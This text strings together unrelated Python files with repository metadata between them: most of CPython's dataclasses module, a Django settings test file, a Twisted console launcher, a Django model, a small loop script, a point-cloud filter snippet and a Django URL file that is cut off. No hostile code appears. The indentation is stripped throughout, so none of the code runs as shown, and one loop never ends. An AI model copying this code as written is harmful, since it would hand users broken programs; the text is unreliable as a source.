# Decorator to make a repr function return "..." for a recursive
# call.
repr_running = set()
@functools.wraps(user_function)
def wrapper(self):
key = id(self), _thread.get_ident()
if key in repr_running:
return '...'
repr_running.add(key)
try:
result = user_function(self)
finally:
repr_running.discard(key)
return result
return wrapper
def _create_fn(name, args, body, *, globals=None, locals=None,
return_type=MISSING):
# Note that we mutate locals when exec() is called. Caller
# beware! The only callers are internal to this module, so no
# worries about external callers.
if locals is None:
locals = {}
# __builtins__ may be the "builtins" module or
# the value of its "__dict__",
# so make sure "__builtins__" is the module.
if globals is not None and '__builtins__' not in globals:
globals['__builtins__'] = builtins
return_annotation = ''
if return_type is not MISSING:
locals['_return_type'] = return_type
return_annotation = '->_return_type'
args = ','.join(args)
body = '\n'.join(f' {b}' for b in body)
# Compute the text of the entire function.
txt = f'def {name}({args}){return_annotation}:\n{body}'
exec(txt, globals, locals)
return locals[name]
def _field_assign(frozen, name, value, self_name):
# If we're a frozen class, then assign to our fields in __init__
# via object.__setattr__. Otherwise, just use a simple
# assignment.
#
# self_name is what "self" is called in this function: don't
# hard-code "self", since that might be a field name.
if frozen:
return f'__builtins__.object.__setattr__({self_name},{name!r},{value})'
return f'{self_name}.{name}={value}'
def _field_init(f, frozen, globals, self_name):
# Return the text of the line in the body of __init__ that will
# initialize this field.
default_name = f'_dflt_{f.name}'
if f.default_factory is not MISSING:
if f.init:
# This field has a default factory. If a parameter is
# given, use it. If not, call the factory.
globals[default_name] = f.default_factory
value = (f'{default_name}() '
f'if {f.name} is _HAS_DEFAULT_FACTORY '
f'else {f.name}')
else:
# This is a field that's not in the __init__ params, but
# has a default factory function. It needs to be
# initialized here by calling the factory function,
# because there's no other way to initialize it.
# For a field initialized with a default=defaultvalue, the
# class dict just has the default value
# (cls.fieldname=defaultvalue). But that won't work for a
# default factory, the factory must be called in __init__
# and we must assign that to self.fieldname. We can't
# fall back to the class dict's value, both because it's
# not set, and because it might be different per-class
# (which, after all, is why we have a factory function!).
globals[default_name] = f.default_factory
value = f'{default_name}()'
else:
# No default factory.
if f.init:
if f.default is MISSING:
# There's no default, just do an assignment.
value = f.name
elif f.default is not MISSING:
globals[default_name] = f.default
value = f.name
else:
# This field does not need initialization. Signify that
# to the caller by returning None.
return None
# Only test this now, so that we can create variables for the
# default. However, return None to signify that we're not going
# to actually do the assignment statement for InitVars.
if f._field_type is _FIELD_INITVAR:
return None
# Now, actually generate the field assignment.
return _field_assign(frozen, f.name, value, self_name)
def _init_param(f):
# Return the __init__ parameter string for this field. For
# example, the equivalent of 'x:int=3' (except instead of 'int',
# reference a variable set to int, and instead of '3', reference a
# variable set to 3).
if f.default is MISSING and f.default_factory is MISSING:
# There's no default, and no default_factory, just output the
# variable name and type.
default = ''
elif f.default is not MISSING:
# There's a default, this will be the name that's used to look
# it up.
default = f'=_dflt_{f.name}'
elif f.default_factory is not MISSING:
# There's a factory function. Set a marker.
default = '=_HAS_DEFAULT_FACTORY'
return f'{f.name}:_type_{f.name}{default}'
def _init_fn(fields, frozen, has_post_init, self_name):
# fields contains both real fields and InitVar pseudo-fields.
# Make sure we don't have fields without defaults following fields
# with defaults. This actually would be caught when exec-ing the
# function source code, but catching it here gives a better error
# message, and future-proofs us in case we build up the function
# using ast.
seen_default = False
for f in fields:
# Only consider fields in the __init__ call.
if f.init:
if not (f.default is MISSING and f.default_factory is MISSING):
seen_default = True
elif seen_default:
raise TypeError(f'non-default argument {f.name!r} '
'follows default argument')
globals = {'MISSING': MISSING,
'_HAS_DEFAULT_FACTORY': _HAS_DEFAULT_FACTORY}
body_lines = []
for f in fields:
line = _field_init(f, frozen, globals, self_name)
# line is None means that this field doesn't require
# initialization (it's a pseudo-field). Just skip it.
if line:
body_lines.append(line)
# Does this class have a post-init function?
if has_post_init:
params_str = ','.join(f.name for f in fields
if f._field_type is _FIELD_INITVAR)
body_lines.append(f'{self_name}.{_POST_INIT_NAME}({params_str})')
# If no body lines, use 'pass'.
if not body_lines:
body_lines = ['pass']
locals = {f'_type_{f.name}': f.type for f in fields}
return _create_fn('__init__',
[self_name] + [_init_param(f) for f in fields if f.init],
body_lines,
locals=locals,
globals=globals,
return_type=None)
def _repr_fn(fields):
fn = _create_fn('__repr__',
('self',),
['return self.__class__.__qualname__ + f"(' +
', '.join([f"{f.name}={{self.{f.name}!r}}"
for f in fields]) +
')"'])
return _recursive_repr(fn)
def _frozen_get_del_attr(cls, fields):
# XXX: globals is modified on the first call to _create_fn, then
# the modified version is used in the second call. Is this okay?
globals = {'cls': cls,
'FrozenInstanceError': FrozenInstanceError}
if fields:
fields_str = '(' + ','.join(repr(f.name) for f in fields) + ',)'
else:
# Special case for the zero-length tuple.
fields_str = '()'
return (_create_fn('__setattr__',
('self', 'name', 'value'),
(f'if type(self) is cls or name in {fields_str}:',
' raise FrozenInstanceError(f"cannot assign to field {name!r}")',
f'super(cls, self).__setattr__(name, value)'),
globals=globals),
_create_fn('__delattr__',
('self', 'name'),
(f'if type(self) is cls or name in {fields_str}:',
' raise FrozenInstanceError(f"cannot delete field {name!r}")',
f'super(cls, self).__delattr__(name)'),
globals=globals),
)
def _cmp_fn(name, op, self_tuple, other_tuple):
# Create a comparison function. If the fields in the object are
# named 'x' and 'y', then self_tuple is the string
# '(self.x,self.y)' and other_tuple is the string
# '(other.x,other.y)'.
return _create_fn(name,
('self', 'other'),
[ 'if other.__class__ is self.__class__:',
f' return {self_tuple}{op}{other_tuple}',
'return NotImplemented'])
def _hash_fn(fields):
self_tuple = _tuple_str('self', fields)
return _create_fn('__hash__',
('self',),
[f'return hash({self_tuple})'])
def _is_classvar(a_type, typing):
# This test uses a typing internal class, but it's the best way to
# test if this is a ClassVar.
return (a_type is typing.ClassVar
or (type(a_type) is typing._GenericAlias
and a_type.__origin__ is typing.ClassVar))
def _is_initvar(a_type, dataclasses):
# The module we're checking against is the module we're
# currently in (dataclasses.py).
return a_type is dataclasses.InitVar
def _is_type(annotation, cls, a_module, a_type, is_type_predicate):
# Given a type annotation string, does it refer to a_type in
# a_module? For example, when checking that annotation denotes a
# ClassVar, then a_module is typing, and a_type is
# typing.ClassVar.
# It's possible to look up a_module given a_type, but it involves
# looking in sys.modules (again!), and seems like a waste since
# the caller already knows a_module.
# - annotation is a string type annotation
# - cls is the class that this annotation was found in
# - a_module is the module we want to match
# - a_type is the type in that module we want to match
# - is_type_predicate is a function called with (obj, a_module)
# that determines if obj is of the desired type.
# Since this test does not do a local namespace lookup (and
# instead only a module (global) lookup), there are some things it
# gets wrong.
# With string annotations, cv0 will be detected as a ClassVar:
# CV = ClassVar
# @dataclass
# class C0:
# cv0: CV
# But in this example cv1 will not be detected as a ClassVar:
# @dataclass
# class C1:
# CV = ClassVar
# cv1: CV
# In C1, the code in this function (_is_type) will look up "CV" in
# the module and not find it, so it will not consider cv1 as a
# ClassVar. This is a fairly obscure corner case, and the best
# way to fix it would be to eval() the string "CV" with the
# correct global and local namespaces. However that would involve
# a eval() penalty for every single field of every dataclass
# that's defined. It was judged not worth it.
match = _MODULE_IDENTIFIER_RE.match(annotation)
if match:
ns = None
module_name = match.group(1)
if not module_name:
# No module name, assume the class's module did
# "from dataclasses import InitVar".
ns = sys.modules.get(cls.__module__).__dict__
else:
# Look up module_name in the class's module.
module = sys.modules.get(cls.__module__)
if module and module.__dict__.get(module_name) is a_module:
ns = sys.modules.get(a_type.__module__).__dict__
if ns and is_type_predicate(ns.get(match.group(2)), a_module):
return True
return False
def _get_field(cls, a_name, a_type):
# Return a Field object for this field name and type. ClassVars
# and InitVars are also returned, but marked as such (see
# f._field_type).
# If the default value isn't derived from Field, then it's only a
# normal default value. Convert it to a Field().
default = getattr(cls, a_name, MISSING)
if isinstance(default, Field):
f = default
else:
if isinstance(default, types.MemberDescriptorType):
# This is a field in __slots__, so it has no default value.
default = MISSING
f = field(default=default)
# Only at this point do we know the name and the type. Set them.
f.name = a_name
f.type = a_type
# Assume it's a normal field until proven otherwise. We're next
# going to decide if it's a ClassVar or InitVar, everything else
# is just a normal field.
f._field_type = _FIELD
# In addition to checking for actual types here, also check for
# string annotations. get_type_hints() won't always work for us
# (see https://github.com/python/typing/issues/508 for example),
# plus it's expensive and would require an eval for every stirng
# annotation. So, make a best effort to see if this is a ClassVar
# or InitVar using regex's and checking that the thing referenced
# is actually of the correct type.
# For the complete discussion, see https://bugs.python.org/issue33453
# If typing has not been imported, then it's impossible for any
# annotation to be a ClassVar. So, only look for ClassVar if
# typing has been imported by any module (not necessarily cls's
# module).
typing = sys.modules.get('typing')
if typing:
if (_is_classvar(a_type, typing)
or (isinstance(f.type, str)
and _is_type(f.type, cls, typing, typing.ClassVar,
_is_classvar))):
f._field_type = _FIELD_CLASSVAR
# If the type is InitVar, or if it's a matching string annotation,
# then it's an InitVar.
if f._field_type is _FIELD:
# The module we're checking against is the module we're
# currently in (dataclasses.py).
dataclasses = sys.modules[__name__]
if (_is_initvar(a_type, dataclasses)
or (isinstance(f.type, str)
and _is_type(f.type, cls, dataclasses, dataclasses.InitVar,
_is_initvar))):
f._field_type = _FIELD_INITVAR
# Validations for individual fields. This is delayed until now,
# instead of in the Field() constructor, since only here do we
# know the field name, which allows for better error reporting.
# Special restrictions for ClassVar and InitVar.
if f._field_type in (_FIELD_CLASSVAR, _FIELD_INITVAR):
if f.default_factory is not MISSING:
raise TypeError(f'field {f.name} cannot have a '
'default factory')
# Should I check for other field settings? default_factory
# seems the most serious to check for. Maybe add others. For
# example, how about init=False (or really,
# init=<not-the-default-init-value>)? It makes no sense for
# ClassVar and InitVar to specify init=<anything>.
# For real fields, disallow mutable defaults for known types.
if f._field_type is _FIELD and isinstance(f.default, (list, dict, set)):
raise ValueError(f'mutable default {type(f.default)} for field '
f'{f.name} is not allowed: use default_factory')
return f
def _set_new_attribute(cls, name, value):
# Never overwrites an existing attribute. Returns True if the
# attribute already exists.
if name in cls.__dict__:
return True
setattr(cls, name, value)
return False
# Decide if/how we're going to create a hash function. Key is
# (unsafe_hash, eq, frozen, does-hash-exist). Value is the action to
# take. The common case is to do nothing, so instead of providing a
# function that is a no-op, use None to signify that.
def _hash_set_none(cls, fields):
return None
def _hash_add(cls, fields):
flds = [f for f in fields if (f.compare if f.hash is None else f.hash)]
return _hash_fn(flds)
def _hash_exception(cls, fields):
# Raise an exception.
raise TypeError(f'Cannot overwrite attribute __hash__ '
f'in class {cls.__name__}')
#
# +-------------------------------------- unsafe_hash?
# | +------------------------------- eq?
# | | +------------------------ frozen?
# | | | +---------------- has-explicit-hash?
# | | | |
# | | | | +------- action
# | | | | |
# v v v v v
_hash_action = {(False, False, False, False): None,
(False, False, False, True ): None,
(False, False, True, False): None,
(False, False, True, True ): None,
(False, True, False, False): _hash_set_none,
(False, True, False, True ): None,
(False, True, True, False): _hash_add,
(False, True, True, True ): None,
(True, False, False, False): _hash_add,
(True, False, False, True ): _hash_exception,
(True, False, True, False): _hash_add,
(True, False, True, True ): _hash_exception,
(True, True, False, False): _hash_add,
(True, True, False, True ): _hash_exception,
(True, True, True, False): _hash_add,
(True, True, True, True ): _hash_exception,
}
# See https://bugs.python.org/issue32929#msg312829 for an if-statement
# version of this table.
def _process_class(cls, init, repr, eq, order, unsafe_hash, frozen):
# Now that dicts retain insertion order, there's no reason to use
# an ordered dict. I am leveraging that ordering here, because
# derived class fields overwrite base class fields, but the order
# is defined by the base class, which is found first.
fields = {}
setattr(cls, _PARAMS, _DataclassParams(init, repr, eq, order,
unsafe_hash, frozen))
# Find our base classes in reverse MRO order, and exclude
# ourselves. In reversed order so that more derived classes
# override earlier field definitions in base classes. As long as
# we're iterating over them, see if any are frozen.
any_frozen_base = False
has_dataclass_bases = False
for b in cls.__mro__[-1:0:-1]:
# Only process classes that have been processed by our
# decorator. That is, they have a _FIELDS attribute.
base_fields = getattr(b, _FIELDS, None)
if base_fields:
has_dataclass_bases = True
for f in base_fields.values():
fields[f.name] = f
if getattr(b, _PARAMS).frozen:
any_frozen_base = True
# Annotations that are defined in this class (not in base
# classes). If __annotations__ isn't present, then this class
# adds no new annotations. We use this to compute fields that are
# added by this class.
#
# Fields are found from cls_annotations, which is guaranteed to be
# ordered. Default values are from class attributes, if a field
# has a default. If the default value is a Field(), then it
# contains additional info beyond (and possibly including) the
# actual default value. Pseudo-fields ClassVars and InitVars are
# included, despite the fact that they're not real fields. That's
# dealt with later.
cls_annotations = cls.__dict__.get('__annotations__', {})
# Now find fields in our class. While doing so, validate some
# things, and set the default values (as class attributes) where
# we can.
cls_fields = [_get_field(cls, name, type)
for name, type in cls_annotations.items()]
for f in cls_fields:
fields[f.name] = f
# If the class attribute (which is the default value for this
# field) exists and is of type 'Field', replace it with the
# real default. This is so that normal class introspection
# sees a real default value, not a Field.
if isinstance(getattr(cls, f.name, None), Field):
if f.default is MISSING:
# If there's no default, delete the class attribute.
# This happens if we specify field(repr=False), for
# example (that is, we specified a field object, but
# no default value). Also if we're using a default
# factory. The class attribute should not be set at
# all in the post-processed class.
delattr(cls, f.name)
else:
setattr(cls, f.name, f.default)
# Do we have any Field members that don't also have annotations?
for name, value in cls.__dict__.items():
if isinstance(value, Field) and not name in cls_annotations:
raise TypeError(f'{name!r} is a field but has no type annotation')
# Check rules that apply if we are derived from any dataclasses.
if has_dataclass_bases:
# Raise an exception if any of our bases are frozen, but we're not.
if any_frozen_base and not frozen:
raise TypeError('cannot inherit non-frozen dataclass from a '
'frozen one')
# Raise an exception if we're frozen, but none of our bases are.
if not any_frozen_base and frozen:
raise TypeError('cannot inherit frozen dataclass from a '
'non-frozen one')
# Remember all of the fields on our class (including bases). This
# also marks this class as being a dataclass.
setattr(cls, _FIELDS, fields)
# Was this class defined with an explicit __hash__? Note that if
# __eq__ is defined in this class, then python will automatically
# set __hash__ to None. This is a heuristic, as it's possible
# that such a __hash__ == None was not auto-generated, but it
# close enough.
class_hash = cls.__dict__.get('__hash__', MISSING)
has_explicit_hash = not (class_hash is MISSING or
(class_hash is None and '__eq__' in cls.__dict__))
# If we're generating ordering methods, we must be generating the
# eq methods.
if order and not eq:
raise ValueError('eq must be true if order is true')
if init:
# Does this class have a post-init function?
has_post_init = hasattr(cls, _POST_INIT_NAME)
# Include InitVars and regular fields (so, not ClassVars).
flds = [f for f in fields.values()
if f._field_type in (_FIELD, _FIELD_INITVAR)]
_set_new_attribute(cls, '__init__',
_init_fn(flds,
frozen,
has_post_init,
# The name to use for the "self"
# param in __init__. Use "self"
# if possible.
'__dataclass_self__' if 'self' in fields
else 'self',
))
# Get the fields as a list, and include only real fields. This is
# used in all of the following methods.
field_list = [f for f in fields.values() if f._field_type is _FIELD]
if repr:
flds = [f for f in field_list if f.repr]
_set_new_attribute(cls, '__repr__', _repr_fn(flds))
if eq:
# Create _eq__ method. There's no need for a __ne__ method,
# since python will call __eq__ and negate it.
flds = [f for f in field_list if f.compare]
self_tuple = _tuple_str('self', flds)
other_tuple = _tuple_str('other', flds)
_set_new_attribute(cls, '__eq__',
_cmp_fn('__eq__', '==',
self_tuple, other_tuple))
if order:
# Create and set the ordering methods.
flds = [f for f in field_list if f.compare]
self_tuple = _tuple_str('self', flds)
other_tuple = _tuple_str('other', flds)
for name, op in [('__lt__', '<'),
('__le__', '<='),
('__gt__', '>'),
('__ge__', '>='),
]:
if _set_new_attribute(cls, name,
_cmp_fn(name, op, self_tuple, other_tuple)):
raise TypeError(f'Cannot overwrite attribute {name} '
f'in class {cls.__name__}. Consider using '
'functools.total_ordering')
if frozen:
for fn in _frozen_get_del_attr(cls, field_list):
if _set_new_attribute(cls, fn.__name__, fn):
raise TypeError(f'Cannot overwrite attribute {fn.__name__} '
f'in class {cls.__name__}')
# Decide if/how we're going to create a hash function.
hash_action = _hash_action[bool(unsafe_hash),
bool(eq),
bool(frozen),
has_explicit_hash]
if hash_action:
# No need to call _set_new_attribute here, since by the time
# we're here the overwriting is unconditional.
cls.__hash__ = hash_action(cls, field_list)
if not getattr(cls, '__doc__'):
# Create a class doc-string.
cls.__doc__ = (cls.__name__ +
str(inspect.signature(cls)).replace(' -> None', ''))
return cls
# _cls should never be specified by keyword, so start it with an
# underscore. The presence of _cls is used to detect if this
# decorator is being called with parameters or not.
def dataclass(_cls=None, *, init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=False):
"""Returns the same class as was passed in, with dunder methods
added based on the fields defined in the class.
Examines PEP 526 __annotations__ to determine fields.
If init is true, an __init__() method is added to the class. If
repr is true, a __repr__() method is added. If order is true, rich
comparison dunder methods are added. If unsafe_hash is true, a
__hash__() method function is added. If frozen is true, fields may
not be assigned to after instance creation.
"""
def wrap(cls):
return _process_class(cls, init, repr, eq, order, unsafe_hash, frozen)
# See if we're being called as @dataclass or @dataclass().
if _cls is None:
# We're called with parens.
return wrap
# We're called as @dataclass without parens.
return wrap(_cls)
def fields(class_or_instance):
"""Return a tuple describing the fields of this dataclass.
Accepts a dataclass or an instance of one. Tuple elements are of
type Field.
"""
# Might it be worth caching this, per class?
try:
fields = getattr(class_or_instance, _FIELDS)
except AttributeError:
raise TypeError('must be called with a dataclass type or instance')
# Exclude pseudo-fields. Note that fields is sorted by insertion
# order, so the order of the tuple is as the fields were defined.
return tuple(f for f in fields.values() if f._field_type is _FIELD)
def _is_dataclass_instance(obj):
"""Returns True if obj is an instance of a dataclass."""
return not isinstance(obj, type) and hasattr(obj, _FIELDS)
def is_dataclass(obj):
"""Returns True if obj is a dataclass or an instance of a
dataclass."""
return hasattr(obj, _FIELDS)
def asdict(obj, *, dict_factory=dict):
"""Return the fields of a dataclass instance as a new dictionary mapping
field names to field values.
Example usage:
@dataclass
class C:
x: int
y: int
c = C(1, 2)
assert asdict(c) == {'x': 1, 'y': 2}
If given, 'dict_factory' will be used instead of built-in dict.
The function applies recursively to field values that are
dataclass instances. This will also look into built-in containers:
tuples, lists, and dicts.
"""
if not _is_dataclass_instance(obj):
raise TypeError("asdict() should be called on dataclass instances")
return _asdict_inner(obj, dict_factory)
def _asdict_inner(obj, dict_factory):
if _is_dataclass_instance(obj):
result = []
for f in fields(obj):
value = _asdict_inner(getattr(obj, f.name), dict_factory)
result.append((f.name, value))
return dict_factory(result)
elif isinstance(obj, tuple) and hasattr(obj, '_fields'):
# obj is a namedtuple. Recurse into it, but the returned
# object is another namedtuple of the same type. This is
# similar to how other list- or tuple-derived classes are
# treated (see below), but we just need to create them
# differently because a namedtuple's __init__ needs to be
# called differently (see bpo-34363).
# I'm not using namedtuple's _asdict()
# method, because:
# - it does not recurse in to the namedtuple fields and
# convert them to dicts (using dict_factory).
# - I don't actually want to return a dict here. The the main
# use case here is json.dumps, and it handles converting
# namedtuples to lists. Admittedly we're losing some
# information here when we produce a json list instead of a
# dict. Note that if we returned dicts here instead of
# namedtuples, we could no longer call asdict() on a data
# structure where a namedtuple was used as a dict key.
return type(obj)(*[_asdict_inner(v, dict_factory) for v in obj])
elif isinstance(obj, (list, tuple)):
# Assume we can create an object of this type by passing in a
# generator (which is not true for namedtuples, handled
# above).
return type(obj)(_asdict_inner(v, dict_factory) for v in obj)
elif isinstance(obj, dict):
return type(obj)((_asdict_inner(k, dict_factory),
_asdict_inner(v, dict_factory))
for k, v in obj.items())
else:
return copy.deepcopy(obj)
def astuple(obj, *, tuple_factory=tuple):
"""Return the fields of a dataclass instance as a new tuple of field values.
Example usage::
@dataclass
class C:
x: int
y: int
c = C(1, 2)
assert astuple(c) == (1, 2)
If given, 'tuple_factory' will be used instead of built-in tuple.
The function applies recursively to field values that are
dataclass instances. This will also look into built-in containers:
tuples, lists, and dicts.
"""
if not _is_dataclass_instance(obj):
raise TypeError("astuple() should be called on dataclass instances")
return _astuple_inner(obj, tuple_factory)
def _astuple_inner(obj, tuple_factory):
if _is_dataclass_instance(obj):
result = []
for f in fields(obj):
value = _astuple_inner(getattr(obj, f.name), tuple_factory)
result.append(value)
return tuple_factory(result)
elif isinstance(obj, tuple) and hasattr(obj, '_fields'):
# obj is a namedtuple. Recurse into it, but the returned
# object is another namedtuple of the same type. This is
# similar to how other list- or tuple-derived classes are
# treated (see below), but we just need to create them
# differently because a namedtuple's __init__ needs to be
# called differently (see bpo-34363).
return type(obj)(*[_astuple_inner(v, tuple_factory) for v in obj])
elif isinstance(obj, (list, tuple)):
# Assume we can create an object of this type by passing in a
# generator (which is not true for namedtuples, handled
# above).
return type(obj)(_astuple_inner(v, tuple_factory) for v in obj)
elif isinstance(obj, dict):
return type(obj)((_astuple_inner(k, tuple_factory), _astuple_inner(v, tuple_factory))
for k, v in obj.items())
else:
return copy.deepcopy(obj)
def make_dataclass(cls_name, fields, *, bases=(), namespace=None, init=True,
repr=True, eq=True, order=False, unsafe_hash=False,
frozen=False):
"""Return a new dynamically created dataclass.
The dataclass name will be 'cls_name'. 'fields' is an iterable
of either (name), (name, type) or (name, type, Field) objects. If type is
omitted, use the string 'typing.Any'. Field objects are created by
the equivalent of calling 'field(name, type [, Field-info])'.
C = make_dataclass('C', ['x', ('y', int), ('z', int, field(init=False))], bases=(Base,))
is equivalent to:
@dataclass
class C(Base):
x: 'typing.Any'
y: int
z: int = field(init=False)
For the bases and namespace parameters, see the builtin type() function.
The parameters init, repr, eq, order, unsafe_hash, and frozen are passed to
dataclass().
"""
if namespace is None:
namespace = {}
else:
# Copy namespace since we're going to mutate it.
namespace = namespace.copy()
# While we're looking through the field names, validate that they
# are identifiers, are not keywords, and not duplicates.
seen = set()
anns = {}
for item in fields:
if isinstance(item, str):
name = item
tp = 'typing.Any'
elif len(item) == 2:
name, tp, = item
elif len(item) == 3:
name, tp, spec = item
namespace[name] = spec
else:
raise TypeError(f'Invalid field: {item!r}')
if not isinstance(name, str) or not name.isidentifier():
raise TypeError(f'Field names must be valid identifers: {name!r}')
if keyword.iskeyword(name):
raise TypeError(f'Field names must not be keywords: {name!r}')
if name in seen:
raise TypeError(f'Field name duplicated: {name!r}')
seen.add(name)
anns[name] = tp
namespace['__annotations__'] = anns
# We use `types.new_class()` instead of simply `type()` to allow dynamic creation
# of generic dataclassses.
cls = types.new_class(cls_name, bases, {}, lambda ns: ns.update(namespace))
return dataclass(cls, init=init, repr=repr, eq=eq, order=order,
unsafe_hash=unsafe_hash, frozen=frozen)
def replace(obj, **changes):
"""Return a new object replacing specified fields with new values.
This is especially useful for frozen classes. Example usage:
@dataclass(frozen=True)
class C:
x: int
y: int
c = C(1, 2)
c1 = replace(c, x=3)
assert c1.x == 3 and c1.y == 2
"""
# We're going to mutate 'changes', but that's okay because it's a
# new dict, even if called with 'replace(obj, **my_changes)'.
if not _is_dataclass_instance(obj):
raise TypeError("replace() should be called on dataclass instances")
# It's an error to have init=False fields in 'changes'.
# If a field is not in 'changes', read its value from the provided obj.
for f in getattr(obj, _FIELDS).values():
# Only consider normal fields or InitVars.
if f._field_type is _FIELD_CLASSVAR:
continue
if not f.init:
# Error if this field is specified in changes.
if f.name in changes:
raise ValueError(f'field {f.name} is declared with '
'init=False, it cannot be specified with '
'replace()')
continue
if f.name not in changes:
if f._field_type is _FIELD_INITVAR:
raise ValueError(f"InitVar {f.name!r} "
'must be specified with replace()')
changes[f.name] = getattr(obj, f.name)
# Create the new object, which calls __init__() and
# __post_init__() (if defined), using all of the init fields we've
# added and/or left in 'changes'. If there are values supplied in
# changes that aren't fields, this will correctly raise a
# TypeError.
return obj.__class__(**changes)
|
FFMG/myoddweb.piger
|
monitor/api/python/Python-3.7.2/Lib/dataclasses.py
|
Python
|
gpl-2.0
| 48,530
|
import sys
import os
from django.test import TestCase, override_settings, Client
from django.conf import settings
from ..conf import (DatabaseUndefined, validate_database,
InaccessibleSettings, _load_py_file, load_py_settings,
load_colab_apps, load_widgets_settings)
from mock import patch
test_files_dir = "./colab/utils/tests"
class TestConf(TestCase):
@override_settings(DEBUG=False, DATABASES={
'default': {
'NAME': settings.DEFAULT_DATABASE,
},
})
def test_database_undefined(self):
with self.assertRaises(DatabaseUndefined):
validate_database(settings.DATABASES, settings.DEFAULT_DATABASE,
settings.DEBUG)
def test_load_py_file_with_io_error(self):
self.assertRaises(InaccessibleSettings,
_load_py_file, 'settings_test', '/etc/colab/')
def test_load_py_file_with_syntax_error(self):
with file('/tmp/settings_with_syntax_error.py', 'w') as temp_settings:
temp_settings.write('(')
self.assertRaises(InaccessibleSettings,
_load_py_file, 'settings_with_syntax_error', '/tmp')
def test_load_py_file(self):
py_settings = _load_py_file('colab_settings', test_files_dir)
self.assertIn('SOCIAL_NETWORK_ENABLED', py_settings)
self.assertTrue(py_settings['SOCIAL_NETWORK_ENABLED'])
self.assertIn('EMAIL_PORT', py_settings)
self.assertEquals(py_settings['EMAIL_PORT'], 25)
@patch('os.getenv', return_value='/path/fake/settings.py')
def test_load_py_settings_with_inaccessible_settings(self, mock):
self.assertRaises(InaccessibleSettings, load_py_settings)
def test_load_py_settings_without_settings_d(self):
COLAB_SETTINGS_DIR = ''
if 'COLAB_SETTINGS_DIR' in os.environ:
COLAB_SETTINGS_DIR = os.environ['COLAB_SETTINGS_DIR']
del os.environ['COLAB_SETTINGS_DIR']
py_settings = load_py_settings('/path/fake/settings.d/test.py')
self.assertIn('SOCIAL_NETWORK_ENABLED', py_settings)
self.assertTrue(py_settings['SOCIAL_NETWORK_ENABLED'])
self.assertIn('EMAIL_PORT', py_settings)
self.assertEquals(py_settings['EMAIL_PORT'], 25)
if COLAB_SETTINGS_DIR:
os.environ['COLAB_SETTINGS_DIR'] = COLAB_SETTINGS_DIR
@patch('os.listdir', return_value=[test_files_dir + '/settings.d/test.py',
'non_python_file'])
@patch('colab.utils.conf._load_py_file',
side_effect=[{'SOCIAL_NETWORK_ENABLED': True, 'EMAIL_PORT': 25},
{'TEST': 'test'}])
def test_load_py_settings_with_settings_d(self, mock_py, mock_listdir):
py_settings = load_py_settings(test_files_dir + '/settings.d/')
self.assertIn('SOCIAL_NETWORK_ENABLED', py_settings)
self.assertTrue(py_settings['SOCIAL_NETWORK_ENABLED'])
self.assertIn('EMAIL_PORT', py_settings)
self.assertEquals(py_settings['EMAIL_PORT'], 25)
self.assertIn('TEST', py_settings)
self.assertEquals(py_settings['TEST'], 'test')
@patch('os.getenv', return_value='/path/fake/plugins.d/')
def test_load_colab_apps_without_plugins_d_directory(self, mock):
colab_apps = load_colab_apps()
self.assertIn('COLAB_APPS', colab_apps)
self.assertEquals(colab_apps['COLAB_APPS'], {})
@patch('os.getenv', return_value=test_files_dir + '/plugins.d/')
def test_load_colab_apps_with_plugins_d_directory(self, os_getenv):
sys.path.insert(0, os_getenv.return_value)
colab_apps = load_colab_apps()
self.assertIn('gitlab', colab_apps['COLAB_APPS'])
self.assertIn('noosfero', colab_apps['COLAB_APPS'])
sys.path.remove(os_getenv.return_value)
self.assertNotIn(os_getenv.return_value, sys.path)
@patch('os.getenv', return_value='/path/fake/widgets_settings.py')
def test_load_widgets_settings_without_settings(self, mock):
self.assertIsNone(load_widgets_settings())
@patch('os.getenv', side_effect=[test_files_dir + '/colab_settings.py',
'/path/fake/widgets_settings.py'])
def test_load_widgets_settings_without_settings_d(self, mock):
self.assertIsNone(load_widgets_settings())
def test_blacklist(self):
client = Client()
response = client.get('/test_blacklist')
self.assertEquals(403, response.status_code)
|
colab/colab
|
colab/utils/tests/test_conf.py
|
Python
|
gpl-2.0
| 4,536
|
#!/usr/bin/python
# CACConsole Copyright (C) 2015 foospidy
# https://github.com/foospidy/CACConsole
# See LICENSE for details
# This software includes/uses the python-cloudatcost library which
# is MIT licensed, see https://github.com/adc4392/python-cloudatcost/blob/master/LICENSE
import os
import sys
from twisted.internet import reactor, stdio
from twisted.python import log
from twisted.python.log import ILogObserver, FileLogObserver
from twisted.python.logfile import DailyLogFile
from modules.CloudAtCostConsole import CloudAtCostConsole
# prevent creation of compiled bytecode files
sys.dont_write_bytecode = True
# setup log file
log_path = os.path.dirname(os.path.abspath(__file__)) + '/log/'
log_file_name = 'cacconsole.log'
# create log directory if it doesn't exist
if not os.path.exists(os.path.dirname(log_path)):
os.makedirs(os.path.dirname(log_path))
log_file = DailyLogFile(log_file_name, log_path)
file_log_observer = FileLogObserver(log_file)
file_log_observer.timeFormat = "%Y-%m-%d %H:%M:%S,%f,"
# start logging
log.startLoggingWithObserver(file_log_observer.emit, False)
# setup local database
dbfile = os.path.dirname(os.path.abspath(__file__)) + '/data/cacconsole.db'
# create data directory if it doesn't exist
if not os.path.exists(os.path.dirname(dbfile)):
os.makedirs(os.path.dirname(dbfile))
# load console
stdio.StandardIO(CloudAtCostConsole(dbfile))
# start reactor
reactor.run()
|
foospidy/CACConsole
|
cacconsole.py
|
Python
|
gpl-2.0
| 1,460
|
from django.db import models
# Create your models here.
class Author(models.Model):
first_name = models.CharField(max_length = 100)
last_name = models.CharField(max_length = 100)
date_of_birth = models.DateField()
profile_photo = models.ImageField(upload_to="media")
linkedin_link = models.URLField(max_length=250)
personal_website_link = models.URLField(max_length=250, blank=True)
bio = models.TextField()
|
slonak79/MBDreamers
|
bios/models.py
|
Python
|
gpl-2.0
| 443
|
x = 2
cont = 0
while x >= 0:
y = 0
while y <= 4:
print(y)#comando qualquer
y = y - 1
x = x - 1
|
david81brs/seaport
|
5.py
|
Python
|
gpl-2.0
| 122
|
import pcl
p = pcl.PointCloud()
p.from_file("test_pcd.pcd")
fil = p.make_statistical_outlier_filter()
fil.set_mean_k (50)
fil.set_std_dev_mul_thresh (1.0)
fil.filter().to_file("inliers.pcd")
|
hunter-87/binocular-dense-stereo
|
cpp_pcl_visualization/pcl_visualization_pcd/pcl_test.py
|
Python
|
gpl-2.0
| 190
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'metuly.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
